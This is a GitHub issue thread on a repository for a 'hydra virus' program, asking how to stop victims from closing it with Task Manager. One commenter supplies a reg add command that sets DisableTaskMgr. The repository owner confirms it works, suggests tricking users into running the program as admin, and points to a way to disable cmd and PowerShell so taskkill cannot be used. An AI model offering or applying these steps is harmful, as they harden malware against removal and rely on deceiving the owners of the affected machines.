Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

How to make it so hydra can not be shutdown with task manager #1

Open
kcool410 opened this issue Jan 18, 2021 · 4 comments
Open

How to make it so hydra can not be shutdown with task manager #1

kcool410 opened this issue Jan 18, 2021 · 4 comments

Comments

@kcool410
Copy link

Hello, I was wondering if it is possible to so the hydra virus cant be shut down with the task manager. Please can you tell me

thx

@giabao4498
Copy link
Owner

Hi! I think it may be possible but I haven't figured out. I will try when I have time

@kcool410
Copy link
Author

Thank you.

@TheDragonSlays
Copy link

I found it!
This should disable task manager:

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul

@giabao4498
Copy link
Owner

@TheDragonSlays I ran it in powershell & it worked. However, you must run powershell as admin to be able to add registries. My guess is, you need to trick users to run Hydra as admin to be able to disable task manager.
I also found a similar way to disable shells (cmd, powershell,...) so that users can't use taskkill command to kill processes https://www.makeuseof.com/windows-disable-command-prompt-powershell/
However, I'm unable to disable taskkill.exe, which is the taskkill command (I believe so)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants